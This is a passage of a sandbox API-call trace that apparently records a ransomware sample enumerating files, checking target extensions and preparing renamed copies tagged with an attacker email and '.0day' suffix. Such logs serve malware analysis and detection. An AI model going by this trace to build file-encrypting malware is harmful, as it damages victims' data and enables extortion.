lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=237208) returned 1 [0048.815] CloseHandle (hObject=0x210) returned 1 [0048.815] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_rgb_pal.wmv")) returned 0x20 [0048.816] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_rgb_pal.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0048.816] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_rgb_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0048.816] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv") returned 77 [0048.816] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv") returned 77 [0048.816] lstrlenW (lpString=".doc") returned 4 [0048.816] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0048.816] lstrlenW (lpString=".docx") returned 5 [0048.816] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0048.816] lstrlenW (lpString=".pdf") returned 4 [0048.816] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0048.816] lstrlenW (lpString=".xls") returned 4 [0048.816] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0048.816] lstrlenW (lpString=".xlsx") returned 5 [0048.816] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0048.816] lstrlenW (lpString=".ppt") returned 4 [0048.816] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0048.816] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv") returned 77 [0048.816] lstrlenW (lpString=".zip") returned 4 [0048.816] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0048.816] lstrlenW (lpString=".rar") returned 4 [0048.816] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0048.816] lstrlenW (lpString=".bz2") returned 4 [0048.816] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0048.816] lstrlenW (lpString=".7z") returned 3 [0048.816] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0048.816] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv") returned 77 [0048.816] lstrlenW (lpString=".dbf") returned 4 [0048.816] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0048.816] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv") returned 77 [0048.816] lstrlenW (lpString=".1cd") returned 4 [0048.816] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0048.817] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv") returned 77 [0048.817] lstrlenW (lpString=".jpg") returned 4 [0048.817] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0048.817] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv") returned 77 [0048.817] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv") returned 77 [0048.817] lstrlenW (lpString=".doc") returned 4 [0048.817] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0048.817] lstrlenW (lpString=".docx") returned 5 [0048.817] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0048.817] lstrlenW (lpString=".pdf") returned 4 [0048.817] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0048.817] lstrlenW (lpString=".xls") returned 4 [0048.817] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0048.817] lstrlenW (lpString=".xlsx") returned 5 [0048.817] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0048.817] lstrlenW (lpString=".ppt") returned 4 [0048.817] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0048.817] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv") returned 77 [0048.817] lstrlenW (lpString=".zip") returned 4 [0048.817] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0048.817] lstrlenW (lpString=".rar") returned 4 [0048.817] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0048.817] lstrlenW (lpString=".bz2") returned 4 [0048.817] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0048.817] lstrlenW (lpString=".7z") returned 3 [0048.817] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0048.817] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv") returned 77 [0048.817] lstrlenW (lpString=".dbf") returned 4 [0048.817] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0048.817] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv") returned 77 [0048.817] lstrlenW (lpString=".1cd") returned 4 [0048.817] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0048.817] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv") returned 77 [0048.817] lstrlenW (lpString=".jpg") returned 4 [0048.817] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0048.818] lstrcmpiW (lpString1=".png", lpString2=".0day") returned 1 [0048.818] lstrlenW (lpString="highlight.png") returned 13 [0048.818] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\highlight.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.818] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1545) returned 1 [0048.818] CloseHandle (hObject=0x210) returned 1 [0048.818] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\highlight.png")) returned 0x20 [0048.818] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\highlight.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0048.818] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0048.818] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png") returned 66 [0048.818] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png") returned 66 [0048.818] lstrlenW (lpString=".doc") returned 4 [0048.818] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0048.818] lstrlenW (lpString=".docx") returned 5 [0048.818] lstrcmpiW (lpString1=".docx", lpString2="t.png") returned -1 [0048.818] lstrlenW (lpString=".pdf") returned 4 [0048.818] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0048.818] lstrlenW (lpString=".xls") returned 4 [0048.818] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0048.818] lstrlenW (lpString=".xlsx") returned 5 [0048.818] lstrcmpiW (lpString1=".xlsx", lpString2="t.png") returned -1 [0048.818] lstrlenW (lpString=".ppt") returned 4 [0048.819] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0048.819] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png") returned 66 [0048.819] lstrlenW (lpString=".zip") returned 4 [0048.819] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0048.819] lstrlenW (lpString=".rar") returned 4 [0048.819] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0048.819] lstrlenW (lpString=".bz2") returned 4 [0048.819] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0048.819] lstrlenW (lpString=".7z") returned 3 [0048.819] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0048.819] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png") returned 66 [0048.819] lstrlenW (lpString=".dbf") returned 4 [0048.819] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0048.819] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png") returned 66 [0048.819] lstrlenW (lpString=".1cd") returned 4 [0048.819] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0048.819] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png") returned 66 [0048.819] lstrlenW (lpString=".jpg") returned 4 [0048.819] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0048.819] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png") returned 66 [0048.819] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png") returned 66 [0048.819] lstrlenW (lpString=".doc") returned 4 [0048.819] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0048.819] lstrlenW (lpString=".docx") returned 5 [0048.819] lstrcmpiW (lpString1=".docx", lpString2="t.png") returned -1 [0048.819] lstrlenW (lpString=".pdf") returned 4 [0048.819] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0048.819] lstrlenW (lpString=".xls") returned 4 [0048.819] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0048.819] lstrlenW (lpString=".xlsx") returned 5 [0048.819] lstrcmpiW (lpString1=".xlsx", lpString2="t.png") returned -1 [0048.819] lstrlenW (lpString=".ppt") returned 4 [0048.819] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0048.819] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png") returned 66 [0048.820] lstrlenW (lpString=".zip") returned 4 [0048.820] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0048.820] lstrlenW (lpString=".rar") returned 4 [0048.820] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0048.820] lstrlenW (lpString=".bz2") returned 4 [0048.820] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0048.820] lstrlenW (lpString=".7z") returned 3 [0048.820] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0048.820] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png") returned 66 [0048.820] lstrlenW (lpString=".dbf") returned 4 [0048.820] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0048.820] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png") returned 66 [0048.820] lstrlenW (lpString=".1cd") returned 4 [0048.820] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0048.820] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png") returned 66 [0048.820] lstrlenW (lpString=".jpg") returned 4 [0048.820] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0048.820] lstrcmpiW (lpString1=".png", lpString2=".0day") returned 1 [0048.820] lstrlenW (lpString="mainimage-mask.png") returned 18 [0048.820] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\mainimage-mask.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.820] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=9115) returned 1 [0048.820] CloseHandle (hObject=0x210) returned 1 [0048.820] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\mainimage-mask.png")) returned 0x20 [0048.821] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\mainimage-mask.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0048.821] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\mainimage-mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0048.821] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png") returned 71 [0048.821] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png") returned 71 [0048.821] lstrlenW (lpString=".doc") returned 4 [0048.821] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0048.821] lstrlenW (lpString=".docx") returned 5 [0048.821] lstrcmpiW (lpString1=".docx", lpString2="k.png") returned -1 [0048.821] lstrlenW (lpString=".pdf") returned 4 [0048.821] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0048.821] lstrlenW (lpString=".xls") returned 4 [0048.821] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0048.821] lstrlenW (lpString=".xlsx") returned 5 [0048.821] lstrcmpiW (lpString1=".xlsx", lpString2="k.png") returned -1 [0048.821] lstrlenW (lpString=".ppt") returned 4 [0048.821] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0048.821] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png") returned 71 [0048.821] lstrlenW (lpString=".zip") returned 4 [0048.821] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0048.821] lstrlenW (lpString=".rar") returned 4 [0048.821] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0048.821] lstrlenW (lpString=".bz2") returned 4 [0048.821] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0048.821] lstrlenW (lpString=".7z") returned 3 [0048.821] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0048.821] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png") returned 71 [0048.821] lstrlenW (lpString=".dbf") returned 4 [0048.821] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0048.821] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png") returned 71 [0048.821] lstrlenW (lpString=".1cd") returned 4 [0048.821] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0048.821] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png") returned 71 [0048.821] lstrlenW (lpString=".jpg") returned 4 [0048.821] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0048.822] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png") returned 71 [0048.822] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png") returned 71 [0048.822] lstrlenW (lpString=".doc") returned 4 [0048.822] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0048.822] lstrlenW (lpString=".docx") returned 5 [0048.822] lstrcmpiW (lpString1=".docx", lpString2="k.png") returned -1 [0048.822] lstrlenW (lpString=".pdf") returned 4 [0048.822] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0048.822] lstrlenW (lpString=".xls") returned 4 [0048.822] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0048.822] lstrlenW (lpString=".xlsx") returned 5 [0048.822] lstrcmpiW (lpString1=".xlsx", lpString2="k.png") returned -1 [0048.822] lstrlenW (lpString=".ppt") returned 4 [0048.822] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0048.822] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png") returned 71 [0048.822] lstrlenW (lpString=".zip") returned 4 [0048.822] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0048.822] lstrlenW (lpString=".rar") returned 4 [0048.822] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0048.822] lstrlenW (lpString=".bz2") returned 4 [0048.822] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0048.822] lstrlenW (lpString=".7z") returned 3 [0048.822] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0048.822] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png") returned 71 [0048.822] lstrlenW (lpString=".dbf") returned 4 [0048.822] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0048.822] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png") returned 71 [0048.822] lstrlenW (lpString=".1cd") returned 4 [0048.822] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0048.822] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png") returned 71 [0048.822] lstrlenW (lpString=".jpg") returned 4 [0048.822] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0048.823] lstrcmpiW (lpString1=".png", lpString2=".0day") returned 1 [0048.823] lstrlenW (lpString="notes-static.png") returned 16 [0048.823] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\notes-static.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.823] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1369) returned 1 [0048.823] CloseHandle (hObject=0x210) returned 1 [0048.823] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\notes-static.png")) returned 0x20 [0048.824] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\notes-static.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0048.824] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\notes-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0048.824] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png") returned 69 [0048.824] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png") returned 69 [0048.824] lstrlenW (lpString=".doc") returned 4 [0048.824] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0048.824] lstrlenW (lpString=".docx") returned 5 [0048.824] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0048.824] lstrlenW (lpString=".pdf") returned 4 [0048.824] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0048.824] lstrlenW (lpString=".xls") returned 4 [0048.824] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0048.824] lstrlenW (lpString=".xlsx") returned 5 [0048.824] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0048.824] lstrlenW (lpString=".ppt") returned 4 [0048.824] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0048.824] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png") returned 69 [0048.824] lstrlenW (lpString=".zip") returned 4 [0048.824] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0048.824] lstrlenW (lpString=".rar") returned 4 [0048.824] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0048.824] lstrlenW (lpString=".bz2") returned 4 [0048.824] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0048.824] lstrlenW (lpString=".7z") returned 3 [0048.824] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0048.824] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png") returned 69 [0048.824] lstrlenW (lpString=".dbf") returned 4 [0048.824] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0048.824] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png") returned 69 [0048.824] lstrlenW (lpString=".1cd") returned 4 [0048.824] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0048.824] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png") returned 69 [0048.825] lstrlenW (lpString=".jpg") returned 4 [0048.825] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0048.825] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png") returned 69 [0048.825] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png") returned 69 [0048.825] lstrlenW (lpString=".doc") returned 4 [0048.825] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0048.825] lstrlenW (lpString=".docx") returned 5 [0048.825] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0048.825] lstrlenW (lpString=".pdf") returned 4 [0048.825] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0048.825] lstrlenW (lpString=".xls") returned 4 [0048.825] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0048.825] lstrlenW (lpString=".xlsx") returned 5 [0048.825] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0048.825] lstrlenW (lpString=".ppt") returned 4 [0048.825] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0048.825] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png") returned 69 [0048.825] lstrlenW (lpString=".zip") returned 4 [0048.825] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0048.825] lstrlenW (lpString=".rar") returned 4 [0048.825] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0048.825] lstrlenW (lpString=".bz2") returned 4 [0048.825] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0048.825] lstrlenW (lpString=".7z") returned 3 [0048.825] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0048.825] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png") returned 69 [0048.825] lstrlenW (lpString=".dbf") returned 4 [0048.825] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0048.825] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png") returned 69 [0048.825] lstrlenW (lpString=".1cd") returned 4 [0048.825] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0048.825] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png") returned 69 [0048.825] lstrlenW (lpString=".jpg") returned 4 [0048.825] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0048.826] lstrcmpiW (lpString1=".png", lpString2=".0day") returned 1 [0048.826] lstrlenW (lpString="play-static.png") returned 15 [0048.826] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\play-static.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.826] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1285) returned 1 [0048.826] CloseHandle (hObject=0x210) returned 1 [0048.826] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\play-static.png")) returned 0x20 [0048.826] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\play-static.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0048.826] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\play-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0048.827] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned 68 [0048.827] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned 68 [0048.827] lstrlenW (lpString=".doc") returned 4 [0048.828] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0048.828] lstrlenW (lpString=".docx") returned 5 [0048.828] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0048.828] lstrlenW (lpString=".pdf") returned 4 [0048.828] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0048.828] lstrlenW (lpString=".xls") returned 4 [0048.828] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0048.828] lstrlenW (lpString=".xlsx") returned 5 [0048.828] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0048.828] lstrlenW (lpString=".ppt") returned 4 [0048.828] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0048.828] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned 68 [0048.828] lstrlenW (lpString=".zip") returned 4 [0048.828] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0048.828] lstrlenW (lpString=".rar") returned 4 [0048.828] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0048.828] lstrlenW (lpString=".bz2") returned 4 [0048.828] 